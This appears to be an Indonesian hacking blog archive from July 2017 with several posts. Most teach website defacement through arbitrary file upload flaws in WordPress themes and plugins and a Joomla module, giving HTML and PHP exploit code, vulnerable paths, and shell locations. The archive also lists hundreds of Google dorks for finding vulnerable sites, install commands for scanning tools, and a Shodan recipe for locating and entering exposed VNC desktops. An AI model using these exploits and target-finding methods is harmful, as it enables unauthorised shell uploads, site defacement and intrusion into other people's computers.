Archive for July 2017

Deface wordpress dengan exploit themes qualifire file upload

Yuppp.. lama ya tidak share exploit deface,sbnrnya saya tidak suka sama deface,hehe,. Kali ini saya mau share tutorial deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability . Exploit nya sudah lama sih sebenarnya, namun gak tau kenapa sekarang "bersemi kembali" . Oke gak usah lama lama , langsung saja .
Bahan :
HTML Exploit : download
Google Dorks :
inurl:"/wp-content/themes/qualifire"
Use your brain, bitch !
Vuln :
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Simpan exploit di atas dengan format .html. Jangan lupa ganti url nya dengan url target.
Setelah itu buka file exploit nya di browser.


Shell kalian akan berada di localhost/shell.php
Karena langsung berada di public_html, jika kalian hanya ingin deface, bisa langsung pload script.

Sekian tutor Deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability kali ini, happy exploiting.

tools for information gathering

tools for information gathering
yang suka kepoin website nih Mr.Loop bagi,,Nama nya AngryFuzzer
AngryFuzzer - alat untuk mengumpulkan informasi
angryFuzzer
AngryFuzz3r adalah kumpulan alat untuk pentesting untuk mengumpulkan informasi dan menemukan kerentanan target berdasarkan proyek Fuzzedb https://github.com/fuzzdb-project/fuzzdb
UrlFuzz3r-> AngryFuzz3r_1

Temukan file dan direktori tersembunyi di server web. Aplikasi ini mencoba untuk menemukan url path relatif dari situs web yang diberikan dengan membandingkannya dengan himpunan yang diberikan.
fitur

Usage

$ python angryFuzzer.py -h
Usage: angryFuzzer.py [options]

Options:
  -h, --help            show this help message and exit
  -q, --quiet           Silent mode ,only repport
  -u URL, --url=URL      URL of the Target
  -c CMS, --cms=CMS     scan CMS ==> wp ,dp
  -w WORDLIST, --wordlist=WORDLIST
                        Custom wordlist
Example:
  • Fuzzing an url with default dictionnaire
python angryFuzzer.py -u https://127.0.0.1
  • Fuzzing CMS (wp: in this exemple !)
python angryFuzzer.py -u https://127.0.0.1 --cms wp
  • Fuzzing a custom Wordlist
python angryFuzzer.py -u https://127.0.0.1 -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt

How to install

$ git clone https://github.com/ihebski/angryFuzzer.git $ cd angryFuzzer $ python angryFuzzer.py DOWNLOAD

tool terbaru pencari bug SQL

tool terbaru pencari bug SQL
Hallo shabat mr.loop saya akan membagikan tool pentesting yang gk ribet buat yang mau cari bug sql, sbnrnya tool ini udah di rilis 4 mnggu yang lalu, dan skrang sya mau bgikan tool nya,
Tool nya bernama viSQL nih lihat dulu cara installnya :

viSQL - Scan SQL vulnerability on target site and sites of on server

viSQL
viSQL -  Scan SQL vulnerability on target site and sites of on server
 Installation
~$ git clone https://github.com/blackvkng/viSQL.git
~$ cd viSQL
~# python2 -m pip install -r requirements.txt
~$ python2 viSQL.py --help
ATAU mau kesini juga gk ppa..
DOWNLOAD

Cara Install Python di Windows

Cara Install Python di Windows 

 Python merupakan bahasa pemrograman tingkat tinggi simpel handal yang diperuntukkan untuk layanan desktop dan web.

 
 Cara Menginstall Python di Windows
Pertama, silahkan download installasi python melalui situs resminya SINI Antara versi 2 dan 3 sebenarnya fungsinya sama saja, hanya sedikit perbedaan di syntax, untuk referensi lebih lanjut bisa sobat baca di Google😄. Kali ini saya memilih yang versi 2.7.13

Jika sudah selesai terdownload, klik 2x pada file installasi python

Pilih Install for all users agar python dapat terintegrasi di semua akun Windows (Administrator dan guest). Lalu klik Next
 
Selanjutnya, pilih letak folder installasi untuk pythonnya atau biarkan secara default terinstall di Local Disk C.
Kemudian klik Next

Langsung Next saja

Tunggu proses installasi hingga selesai

Langkah terakir klik Finish, maka Python sudah sukses terinstall di Windows milik sobat

Cara Deface WordPress Plugins WP Checkout - Arbitrary File Upload

WordPress Plugins WP Checkout - Arbitrary File Upload


# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/

2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html

Joomla SocialPinBoard Arbitrary File Upload

Joomla SocialPinBoard Arbitrary File Upload


#TItle: SocialPinBoard AFU (Arbitrary File Upload)
#Author: Con7ext
#Tested On Windows Xp And Linux Ubuntu
#Dork:
#inurl:/index.php?option=com_socialpinboard
#Powered By Socialpinboard
#index of /mod_socialpinboard_menu/
#index of /socialpinboard/
#inurl:/modules/ "Socialpinboard"
################################
Path Of Exploit:
/modules/mod_socialpinboard_menu/saveimagefromupload.php
Or
modules/mod_socialpinboard_menu/upload-file.php
Path Of Shell:/modules/mod_socialpinboard_menu/images/socialpinboard/temp/RANDOMresult.php

Exploit (PHP):
<?php
$uploadfile="low.php";
$ch = curl_init("http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$uploadfile");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Exploit (HTML):
<html>
<body>
<form method="POST" action="http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php" enctype="multipart/form-data">
<input type="file" name="uploadfile" /><button>Upload</button>
</form>
</body>
</html>

Dork wordpresss fresh 2017

Dork Wordpress Fresh 2017-2018

Commot silahkan:
Baut yang maen WP :v Tinggal Comot saja gan :P


  1. inurl: wp-content/plugins/front-end-upload /
  2. inurl: wp-content/plugins/omni-secure-files /
  3. inurl :/ wp-content/plugins/rbxgallery /
  4. inurl :/ wp-content/plugins/wpstorecart /
  5. allinurl :/ wp-content/plugins/wp-easy-gallery /
  6. inurl: wp-content/plugins/front-file-manager /
  7. inurl :/ wp-content/plugins/html5avmanager /
  8. inurl :/ wp-content/plugins/store-locator-le /
  9. inurl :/ wp-content/plugins/wp-property /
  10. inurl :/ wp-content/plugins/HT-Poi /
  11. inurl :/ eklentileri / HT-Poi /
  12. inurl :/ wp-content/plugins/nmedia-user-file-uploader /
  13. inurl :/ wp-content/plugins/foxypress /
  14. inurl :/ wp-content/plugins/comment-extra-field /
  15. inurl :/ wp-content/plugins/asset-manager /
  16. inurl :/ wp-content/plugins/wordpress-member-private-conversation /
  17. inurl :/ wp-content/plugins/gallery-plugin /
  18. inurl :/ wp-content/plugins/fcchat /
  19. inurl :/ wp-content/plugins/font-uploader /
  20. inurl :/ wp-content/plugins/mm-forms-community /
  21. inurl :/ wp-content/plugins/videowhisper-video-presentation /
  22. inurl :/ wp-content/plugins/hungred-post-thumbnail /
  23. inurl :/ wp-content/plugins/pdw-file-browser /
  24. inurl :/ wp-content/plugins/picturesurf-gallery /
  25. / Wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php
  26. inurl: eklentileri / sb-uploader
  27. inurl: eklentileri / dekan-fckeditor-ile-pwwangs-kodu-plugin-için-wordpress /
  28. inurl: wp-content/plugins/topquark/lib / js / fancyupload / vitrin / toplu /
  29. inurl: wp-content/plugins/custom-content-type-manager /
  30. inurl: wp-content/plugins/user-****/framework/helper /
  31. inurl :/ stilleri / admin_tpl /
  32. inurl: wp-content/plugins/pica-photo-gallery /
  33. inurl: wp-content/plugins/drag-drop-file-uploader /
  34. inurl: module_fichier / upload / upload_filemanager.php
  35. inurl :/ modules / filemanager / xupload.php
  36. inurl :/ wp-content/plugins/videowhisper-video-conference-integration /
  37. inurl :/ medya / easyflashuploader / swfs /
  38. inurl :/ wp-content/plugins/auctionPlugin /
  39. inurl :/ modules / mod_jfancy /
  40. inurl :/ images / idoblog / yükleme
  41. inurl :/ bileşenleri / com_dv / formaliteler
  42. inurl :/ modules / mod_artuploader /
  43. inurl :/ wp-content/plugins/contus-hd-flv-player /
  44. inurl :/ wp-content/plugins/contus-video-galleryversion-10 /
  45. inurl :/ yönetici / bileşenleri / com_simpleswfupload
  46. inurl :/ wp-content/plugins/annonces/admin /
  47. inurl :/ wp-content/plugins/evarisk /
  48. inurl :/ wp-content/plugins/invit0r /
  49. inurl :/ wp-content/plugins/zingiri-web-shop /
  50. inurl :/ bileşenleri / com_maianmedia /
  51. inurl :/ modules / mod_dionefileuploader /
  52. inurl :/ bileşenleri / com_hwdvideoshare
  53. inurl :/ wp-content/themes/deep-blue /
  54. inurl :/ wp-content/plugins/lim4wp /
  55. inurl :/ wp-content/themes/famous /
  56. inurl :/ wp-content/plugins/lb-mixed-slideshow /
  57. / Wp-content/themes/TheStyle /
  58. / Wp-content/themes/nool /
  59. / Wp-content/themes/PersonalPress /
  60. / Wp-content/themes/SimplePress /
  61. / Wp-content/themes/DeepFocus /
  62. / Wp-content/themes/DelicateNews /
  63. / Wp-content/themes/Bold /
  64. / Wp-content/themes/eStore /
  65. / / Wp-content/themes/TheProfessional
  66. / Wp-content/themes/OnTheGo /
  67. / Wp-content/themes/AskIt /
  68. / Wp-content/themes/Nova /
  69. / Wp-content/themes/eNews /
  70. / Wp-content/themes/eVid /
  71. / Wp-content/themes/TheCorporation /
  72. / Wp-content/themes/Minimal /
  73. / / Wp-content/themes/Polished
  74. / Wp-content/themes/MyResume /
  75. / Wp-content/themes/TheSource /
  76. / Wp-content/themes/StudioBlue /
  77. / Wp-content/themes/Wooden /
  78. / Wp-content/themes/WhosWho /
  79. / Wp-content/themes/Quadro /
  80. / Wp-content/themes/Glow /
  81. / / Wp-content/themes/Modest
  82. / / Wp-content/themes/Aggregate
  83. / Wp-content/themes/ArtSee /
  84. / Wp-content/themes/versatile /
  85. / Wp-content/themes/omni-shop /
  86. / / Wp-content/themes/manifesto/scripts
  87. / / Wp-content/themes/arthem-mod/scripts
  88. / / Wp-content/themes/echoes
  89. / Wp-content/themes/Bold4 /
  90. / / Wp-content/themes/primely-theme/scripts
  91. / / Wp-content/themes/zenkoreviewRD/scripts
  92. / Wp-content/themes/ElegantEstate /
  93. / Wp-content/themes/PersonalPress2 /
  94. / / Wp-content/themes/mypage/scripts
  95. / / Wp-content/themes/magazinum/scripts
  96. / / Wp-content/themes/pbv_multi/scripts
  97. / / Wp-content/themes/photofeature/scripts
  98. / Wp-content/themes/ColdStone /
  99. / Wp-content/themes/HMDeepFocus /
  100. / Wp-content/themes/EarthlyTouch /
  101. / Wp-content/themes/Boutique /
  102. / Wp-content/themes/ePhoto /
  103. / Wp-content/themes/PureType /
  104. / Wp-content/themes/13Floor /
  105. / Wp-content/themes/BusinessCard /
  106. / Wp-content/themes/CherryTruffle /
  107. / Wp-content/themes/Cion /
  108. / / Wp-content/themes/DailyNotes
  109. / Wp-content/themes/eGallery /
  110. / Wp-content/themes/eGamer /
  111. / Wp-content/themes/GrungeMag /
  112. / Wp-content/themes/Influx /
  113. / Wp-content/themes/LightBright /
  114. / Wp-content/themes/LightSource /
  115. / Wp-content/themes/Magnificent /
  116. / Wp-content/themes/Memoir /
  117. / Wp-content/themes/AskIt_v1.6/AskIt /
  118. / Wp-content/themes/TidalForce /
  119. / Wp-content/themes/Atlantis /
  120. / Wp-content/themes/DelicateNewsYellow /
  121. / Wp-content/themes/themorningafter /
  122. / / Wp-content/themes/arthemia-premium/scripts
  123. / / Wp-content/themes/arthemia/scripts
  124. / / Wp-content/themes/arthemia-premium-park/scripts
  125. / Wp-content/themes/linepress /
  126. / Wp-content/themes/wedding /
  127. / Wp-content/themes/graduate /
  128. / Wp-content/themes/wp-newspaper /
  129. / Wp-content/themes/advanced-newspaper /
  130. / Wp-content/themes/journey /
  131. / Wp-content/themes/newspro /
  132. / Wp-content/themes/transcript /
  133. / Wp-content/themes/showfolio /
  134. / Wp-content/themes/quickstart /
  135. / Wp-content/themes/Restorante /
  136. / Wp-content/themes/snapwire /
  137. / / Wp-content/themes/aqua-blue/includes
  138. / / Wp-content/themes/swatch/functions
  139. / / Wp-content/themes/announcement/functions
  140. / / Wp-content/themes/empire/functions
  141. / / Wp-content/themes/supportpress/functions
  142. / / Wp-content/themes/editorial/functions
  143. / / Wp-content/themes/statua/functions
  144. / / Wp-content/themes/briefed/functions
  145. / / Wp-content/themes/faultpress/functions
  146. / / Wp-content/themes/kaboodle/functions
  147. / / Wp-content/themes/savinggrace/functions
  148. / / Wp-content/themes/premiere/functions
  149. / / Wp-content/themes/simplicity/functions
  150. / / Wp-content/themes/deliciousmagazine/functions
  151. / / Wp-content/themes/canvas-buddypress/functions
  152. / / Wp-content/themes/bookclub/functions
  153. / / Wp-content/themes/boldnews/functions
  154. / / Wp-content/themes/placeholder/functions
  155. / / Wp-content/themes/biznizz/functions
  156. / / Wp-content/themes/auld/functions
  157. / / Wp-content/themes/listings/functions
  158. / / Wp-content/themes/elefolio/functions
  159. / / Wp-content/themes/chapters/functions
  160. / / Wp-content/themes/continuum/functions
  161. / / Wp-content/themes/diner/functions
  162. / / Wp-content/themes/skeptical/functions
  163. / / Wp-content/themes/caffeinated/functions
  164. / / Wp-content/themes/crisp/functions
  165. / / Wp-content/themes/sealight/functions
  166. / / Wp-content/themes/unite/functions
  167. / / Wp-content/themes/estate/functions
  168. / / Wp-content/themes/tma/functions
  169. / / Wp-content/themes/coda/functions
  170. / / Wp-content/themes/inspire/functions
  171. / / Wp-content/themes/apz/functions
  172. / / Wp-content/themes/spectrum/functions
  173. / / Wp-content/themes/diarise/functions
  174. / / Wp-content/themes/boast/functions
  175. / / Wp-content/themes/retreat/functions
  176. / / Wp-content/themes/cityguide/functions
  177. / / Wp-content/themes/cinch/functions
  178. / / Wp-content/themes/slanted/functions
  179. / / Wp-content/themes/canvas/functions
  180. / / Wp-content/themes/postcard/functions
  181. / / Wp-content/themes/delegate/functions
  182. / / Wp-content/themes/mystream/functions
  183. / / Wp-content/themes/optimize/functions
  184. / / Wp-content/themes/backstage/functions
  185. / / Wp-content/themes/sophisticatedfolio/functions
  186. / / Wp-content/themes/bueno/functions
  187. / / Wp-content/themes/digitalfarm/functions
  188. / / Wp-content/themes/headlines/functions
  189. / / Wp-content/themes/f0101/functions
  190. / / Wp-content/themes/royalle/functions
  191. / / Wp-content/themes/exposure/functions
  192. / / Wp-content/themes/rockstar/functions
  193. / / Wp-content/themes/dailyedition/functions
  194. / / Wp-content/themes/object/functions
  195. / / Wp-content/themes/antisocial/functions
  196. / / Wp-content/themes/coffeebreak/functions
  197. / / Wp-content/themes/mortar/functions
  198. / / Wp-content/themes/bigeasy/functions
  199. / / Wp-content/themes/groovyphoto/functions
  200. / / Wp-content/themes/groovyblog/functions
  201. / / Wp-content/themes/mainstream/functions
  202. / / Wp-content/themes/featurepitch/functions
  203. / / Wp-content/themes/suitandtie/functions
  204. / / Wp-content/themes/thejournal/functions
  205. / / Wp-content/themes/myweblog/functions
  206. / / Wp-content/themes/aperture/functions
  207. / / Wp-content/themes/****morphosis/functions
  208. / / Wp-content/themes/bloggingstream/functions
  209. / / Wp-content/themes/thestation/functions
  210. / / Wp-content/themes/groovyvideo/functions
  211. / / Wp-content/themes/productum/functions
  212. / / Wp-content/themes/newsport/functions
  213. / / Wp-content/themes/irresistible/functions
  214. / / Wp-content/themes/cushy/functions
  215. / / Wp-content/themes/wootube/functions
  216. / / Wp-content/themes/forewordthinking/functions
  217. / / Wp-content/themes/geometric/functions
  218. / / Wp-content/themes/abstract/functions
  219. / / Wp-content/themes/busybee/functions
  220. / / Wp-content/themes/blogtheme/functions
  221. / / Wp-content/themes/gothamnews/functions
  222. / / Wp-content/themes/thick/functions
  223. / / Wp-content/themes/typebased/functions
  224. / / Wp-content/themes/overeasy/functions
  225. / / Wp-content/themes/ambience/functions
  226. / / Wp-content/themes/snapshot/functions
  227. / / Wp-content/themes/openair/functions
  228. / / Wp-content/themes/freshfolio/functions
  229. / / Wp-content/themes/papercut/functions
  230. / / Wp-content/themes/proudfolio/functions
  231. / / Wp-content/themes/vibrantcms/functions
  232. / / Wp-content/themes/freshnews/functions
  233. / / Wp-content/themes/livewire/functions
  234. / / Wp-content/themes/gazette/functions
  235. / / Wp-content/themes/flashnews/functions
  236. / / Wp-content/themes/premiumnews/functions
  237. / / Wp-content/themes/newspress/functions
  238. / / Wp-content/themes/8q/scripts
  239. / Wp-content/themes/aerial/lib /
  240. / Wp-content/themes/aesthete /
  241. / / Wp-content/themes/albizia/includes
  242. / Wp-content/themes/amphion-lite/script /
  243. / / Wp-content/themes/aranovo/scripts
  244. / Wp-content/themes/arras/library /
  245. / Wp-content/themes/arras-theme/library /
  246. / / Wp-content/themes/arthemix-bronze/scripts
  247. / / Wp-content/themes/artisan/includes
  248. / / Wp-content/themes/arthemix-green/scripts
  249. / / Wp-content/themes/a-simple-business-theme/scripts
  250. / / Wp-content/themes/a-supercms
  251. / / Wp-content/themes/aureola/scripts
  252. / Wp-content/themes/aurorae /
  253. / Wp-content/themes/autofashion /
  254. / Wp-content/themes/automotive-blog-theme/Quick% 20Cash% 20Auto /
  255. / / Wp-content/themes/bikes
  256. / Wp-content/themes/automotive-blog-theme /
  257. / Wp-content/themes/black_eve /
  258. / / Wp-content/themes/blex/scripts
  259. / / Wp-content/themes/bloggnorge-a1/scripts
  260. / / Wp-content/themes/blogified
  261. / Wp-content/themes/blue-corporate-hyve-theme /
  262. / Wp-content/themes/bluemag/library /
  263. / / Wp-content/themes/blue-news/scripts
  264. / / Wp-content/themes/bombax/includes
  265. / Wp-content/themes/breakingnewz /
  266. / / Wp-content/themes/brightsky/scripts
  267. / / Wp-content/themes/brochure-melbourne/includes
  268. / Wp-content/themes/business-turnkey/assets / js /
  269. / / Wp-content/themes/calotropis/includes
  270. / Wp-content/themes/coffee-lite /
  271. / / Wp-content/themes/comet/scripts
  272. / / Wp-content/themes/conceditor-wp-strict/scripts
  273. / / Wp-content/themes/constructor/layouts
  274. / / Wp-content/themes/constructor/libs
  275. / Wp-content/themes/constructor /
  276. / / Wp-content/themes/coverht-wp/scripts
  277. / / Wp-content/themes/cover-wp/scripts
  278. / Wp-content/themes/dark-dream-media /
  279. / Wp-content/themes/deep-blue /
  280. / / Wp-content/themes/delicate
  281. / Wp-content/themes/diamond-ray /
  282. / / Wp-content/themes/dieselclothings
  283. / Wp-content/themes/digitalblue /
  284. / Wp-content/themes/dimenzion /
  285. / Wp-content/themes/epione/script /
  286. / / Wp-content/themes/evr-green/scripts
  287. / Wp-content/themes/famous/megaframe/megapanel /
  288. / / Wp-content/themes/famous
  289. / Wp-content/themes/fashion-style /
  290. / Wp-content/themes/featuring /
  291. / Wp-content/themes/fliphoto /
  292. / Wp-content/themes/flix /
  293. / / Wp-content/themes/fordreporter/scripts
  294. / Wp-content/themes/freeside /
  295. / / Wp-content/themes/fresh-blu/scripts
  296. / / Wp-content/themes/go-green/modules
  297. / / Wp-content/themes/granite-lite/scripts
  298. / Wp-content/themes/greydove /
  299. / Wp-content/themes/greyzed/functions/efrog/lib /
  300. / Wp-content/themes/gunungkidul /
  301. / Wp-content/themes/heartspotting-beta /
  302. / / Wp-content/themes/heli-1-wordpress-theme/images
  303. / Wp-content/themes/ideatheme /
  304. / Wp-content/themes/impressio/timthumb /
  305. / Wp-content/themes/introvert /
  306. / / Wp-content/themes/inuit-types
  307. / Wp-content/themes/isotherm-news /
  308. / Wp-content/themes/iwana-v10 /
  309. / Wp-content/themes/jambo /
  310. / Wp-content/themes/jcblackone /
  311. / / Wp-content/themes/kratalistic
  312. / Wp-content/themes/life-style-free /
  313. / Wp-content/themes/likehacker /
  314. / / Wp-content/themes/litepress/scripts
  315. / Wp-content/themes/loganpress-premium-theme-1 /
  316. / Wp-content/themes/magazine-basic /
  317. / Wp-content/themes/magup /
  318. / / Wp-content/themes/make-money-online-theme-1/scripts
  319. / / Wp-content/themes/make-money-online-theme-2/scripts
  320. / / Wp-content/themes/make-money-online-theme-3/scripts
  321. / / Wp-content/themes/make-money-online-theme-4/scripts
  322. / / Wp-content/themes/make-money-online-theme/scripts
  323. / / Wp-content/themes/meintest/layouts
  324. / Wp-content/themes/mobilephonecomparision /
  325. / Wp-content/themes/moi-magazine /
  326. / / Wp-content/themes/my-heli/images
  327. / Wp-content/themes/mymag /
  328. / Wp-content/themes/mystique/extensions/auto-thumb /
  329. / Wp-content/themes/nash/theme-assets/php /
  330. / Wp-content/themes/neofresh /
  331. / / Wp-content/themes/neo_wdl/includes/extensions
  332. / / Wp-content/themes/new-green-natural-living-ngnl/scripts
  333. / Wp-content/themes/newspress /
  334. / / Wp-content/themes/pearlie/scripts
  335. / / Wp-content/themes/pico/scripts
  336. / / Wp-content/themes/postage-sydney/includes
  337. / Wp-content/themes/premium-violet /
  338. / Wp-content/themes/probluezine /
  339. / Wp-content/themes/pronto/cjl/pronto/uploadify/check.php
  340. / Wp-content/themes/pronto/cjl/pronto/uploadify/uploadify.php
  341. / Wp-content/themes/r755 /
  342. / Wp-content/themes/regal /
  343. / Wp-content/themes/shaan /
  344. / Wp-content/themes/shadow-block /
  345. / Wp-content/themes/shadow /
  346. / Wp-content/themes/simple-but-great /
  347. / / Wp-content/themes/simplenews_premium/scripts
  348. / Wp-content/themes/simple-red-theme /
  349. / Wp-content/themes/simple-tabloid /
  350. / Wp-content/themes/simplewhite /
  351. / Wp-content/themes/slidette/timThumb /
  352. / Wp-content/themes/snowblind_colbert /
  353. / Wp-content/themes/snowblind /
  354. / Wp-content/themes/spotlight /
  355. / Wp-content/themes/squeezepage /
  356. / Wp-content/themes/standout /
  357. / Wp-content/themes/suffusion /
  358. / / Wp-content/themes/swift/includes
  359. / / Wp-content/themes/swift/includes
  360. / Wp-content/themes/swift /
  361. / / Wp-content/themes/techozoic-fluid/options
  362. / Wp-content/themes/the_dark_os/tools /
  363. / Wp-content/themes/themetiger-fashion /
  364. / Wp-content/themes/theory /
  365. / / Wp-content/themes/the-theme/core/libs/thumbnails
  366. / Wp-content/themes/thrillingtheme /
  367. / Wp-content/themes/tm-theme / js /
  368. / / Wp-content/themes/totallyred/scripts
  369. / / Wp-content/themes/travelogue-theme/scripts
  370. / Wp-content/themes/true-blue-theme /
  371. / Wp-content/themes/ttnews-theme /
  372. / Wp-content/themes/typographywp /
  373. / Wp-content/themes/ugly /
  374. / Wp-content/themes/unity /
  375. / Wp-content/themes/versitility /
  376. / / Wp-content/themes/vibefolio-teaser-10/scripts
  377. / Wp-content/themes/vina /
  378. / Wp-content/themes/whitemag/script /
  379. / Wp-content/themes/wpapi /
  380. / / Wp-content/themes/wpbus-d4/includes
  381. / / Wp-content/themes/wp-creativix/scripts
  382. / / Wp-content/themes/wp-newsmagazine/scripts
  383. / Wp-content/themes/wp-perfect / js /
  384. / Wp-content/themes/wp-premium-orange /
  385. / Wp-content/themes/xiando-one /
  386. / Wp-content/themes/zcool-like /
  387. / Wp-content/themes/zcool-like/uploadify.php
  388. / / Wp-content/themes/twittplus/scripts
  389. / Wp-content/themes/OptimizePress / "/ / wp-content/themes/OptimizePress
  390. / Wp-content/themes/modularity/includes/timthumb.php "Grafik Kağıdı basın Design by"
  391. / Wp-content/themes/cadabrapress/scripts/timthumb.php "/ temalar / cadabrapress / scripts /"
  392. / Wp-content/themes/Avenue/timthumb.php "Caddesi. Tüm hakları saklıdır."
  393. / Wp-content/themes/thedawn/lib/scripts/timthumb.php "thedawn"
  394. / Wp-content/themes/suffusion/timthumb.php "suffusion"
  395. / Wp-content/themes/newsworld/thumbopen.php "Newsworld Powered by"
  396. / Wp-content/themes/widescreen/includes/timthumb.php "gizlemek menüsü"
  397. / Wp-content/themes/Nyke/timthumb.php "Nyke"
  398. / Wp-content/themes/suffusion/timthumb.php "Sayontan Sinha tarafından Kizarma WordPress teması"
  399. / Wp-content/themes/kingsize/timthumb.php "Navigasyon gizlemek"
  400. / Wp-content/themes/headlines_enhanced/thumb.php "PLR Bloglar *** 65533; Site Haritası *** 65533; Gizlilik Politikası"
  401. / Wp-content/themes/classifiedstheme/thumbs / "/ wp-content/themes/classifiedstheme/thumbs /"
  402. / Wp-content/themes/sportpress/scripts/timthumb.php "wp-content/themes/sportpress/scripts /"
  403. / Wp-content/themes/eNews/timthumb.php / wp-content/themes/eNews /
  404. / Wp-content/themes/Nova/timthumb.php / wp-content/themes/Nova /
  405. / Wp-content/plugins/igit-related-posts-with-thumb-images-after-posts / "/ plugins / igit ile ilgili-mesaj-ile-başparmak görüntüleri-sonra-Mesajlar /"
  406. / Wp-content/themes/sportpress/scripts / "wp-content/themes/sportpress/scripts /"
  407. / Wp-content/themes/announcement/functions/thumb.php / temalar / ilan / fonksiyonlar /
  408. / Wp-content/themes/sportpress/scripts/thumb.php "wp-content/themes/sportpress/scripts /"
  409. / Wp-content/themes/LightBright / "wp-content/themes/LightBright /"
  410. / Wp-content/themes/Glider "wp-content/themes/Glider"
  411. / Wp-content/themes/Mystique/cache / wp-content/themes/Mystique/cache /
  412. / Wp-content/plugins/uBillboard / wp-content/plugins/uBillboard /
  413. / Wp-content/themes/wpuniversity/scripts/timthumb.php "wp-content/themes/wpuniversity/scripts"
  414. / Wp-content/themes/mypolylens/sp-framework / wp-content/themes/mypolylens/sp-framework
  415. / Wp-content/themes/sakura/plugins/woo-tumblog / / wp-content/themes/sakura/plugins/woo-tumblog /
  416. / Wp-content/themes/directorypress / / wp-content/themes/directorypress /
  417. / Wp-content/plugins/autofashion / / wp-content/plugins/autofashion
  418. / Wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php "/ wp-content/themes/WPFanPro2.0/lib"
  419. / Wp-content/themes/versatile / wp-content/themes/versatile
  420. / Wp-content/themes/classifiedstheme/thumbs / "/ wp-content/themes/classifiedstheme/thumbs /"
  421. / Wp-content/plugins/akismet / "/ wp-content/plugins/akismet /"
  422. / / Wp-content/gd-star-rating "/ wp-content/gd-star-rating /"
  423. / Wp-content/themes/Memoir / "/ wp-content/themes/Memoir /"
  424. / Blog / wp-content / themes / clockstone / images /
  425. / Wp-content/themes/mio/sp-framework/timthumb/timthumb.php "/ temalar / mio /"
  426. / Wp-content/themes/coda / "/ temalar / koda /"
  427. / Wp-content/themes/OptimizePress / "/ / wp-content/themes/OptimizePress"
  428. wp-content/plugins/wp-pagenavi/timthumb.php
  429. wp-content/plugins/wp-pagenavi/inc/timthumb.php
  430. wp-content/plugins/wp-pagenavi/functions/timthumb.php
  431. wp-content/plugins/wp-pagenavi/scripts/timthumb.php
  432. wp-content/themes/canvas/timthumb.php
  433. wp-content/themes/TheStyle/timthumb.php
  434. wp-content/plugins/wp-mobile-detector/timthumb.php
  435. wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/timthumb.php
  436. wp-content/themes/Magnificent/timthumb.php
  437. wp-content/themes/freshnews/timthumb.php
  438. wp-content/themes/ElegantEstate/timthumb.php
  439. wp-content/themes/bueno/timthumb.php
  440. wp-content/themes/magazinum/scripts/timthumb.php
  441. wp-content/themes/sportpress/scripts/timthumb.php
  442. wp-content/themes/flashnews/timthumb.php
  443. wp-content/plugins/dukapress/lib/timthumb.php
  444. wp-content/plugins/shortcodes-ultimate/lib/timthumb.php
  445. wp-content/plugins/islidex / js / timthumb.php
  446. wp-content/plugins/highlighter/libs/timthumb.php
  447. wp-content/plugins/wordpress-gallery-plugin/timthumb.php
  448. wp-content/plugins/igit-posts-slider-widget/timthumb.php
  449. wp-content/themes/Magnificent/scripts/timthumb.php
  450. wp-content/themes/profitstheme_11/scripts/timthumb.php
  451. wp-content/themes/MyProduct/scripts/timthumb.php
  452. wp-content/themes/canvas/scripts/timthumb.php
  453. wp-content/themes/Glow/scripts/timthumb.php
  454. wp-content/themes/inspire/scripts/timthumb.php
  455. wp-content/themes/overeasy/scripts/timthumb.php
  456. wp-content/themes/Nova/scripts/timthumb.php
  457. wp-content/themes/bueno/scripts/timthumb.php
  458. wp-content/themes/themorningafter/scripts/timthumb.php
  459. wp-content/themes/delegate/scripts/timthumb.php
  460. wp-content/themes/Bold/scripts/timthumb.php
  461. wp-content/themes/eVid/scripts/timthumb.php
  462. wp-content/themes/Apz/scripts/timthumb.php
  463. wp-content/themes/redcarpet/scripts/timthumb.php
  464. wp-content/themes/irresistible/scripts/timthumb.php
  465. wp-content/themes/OnTheGo/scripts/timthumb.php
  466. wp-content/themes/max-3.0.0/scripts/timthumb.php
  467. wp-content/themes/newsworld/scripts/timthumb.php
  468. wp-content/themes/ColdStone/scripts/timthumb.php
  469. wp-content/themes/Chameleon/scripts/timthumb.php
  470. wp-content/themes/Polished/scripts/timthumb.php
  471. wp-content/themes/sealight/scripts/timthumb.php
  472. wp-content/themes/newsworld-1.0.0/scripts/timthumb.php
  473. wp-content/themes/postcard/scripts/timthumb.php
  474. wp-content/themes/Quadro/scripts/timthumb.php

Remote pc With vnc + shodan

Mr.Loop mau beritahu rahasia kpada sobat trcinta>heheh. yaitu remote pc lewat vnc tapi mr.loop gunakan  shodan.io
1. pertama sobat dirumah harus login dulu di https://www.shodan.io 
2.kedua masukan dengan dork nya di kolom seracrh (  has_screenshot:true port:5900 ) boleh kalian edit dengan otak enstein nya.. hehe boleh ditmbhkan dengan (country: my )terserah mau pake id,us,

3.setelah di search akan mncul bnyak srpti gmbar di bawah ini sob









4.lallu masukan deh tarraa....kalo sudah gini kita oprek deh..heheh😂okee sekian dari Mr.loop 👍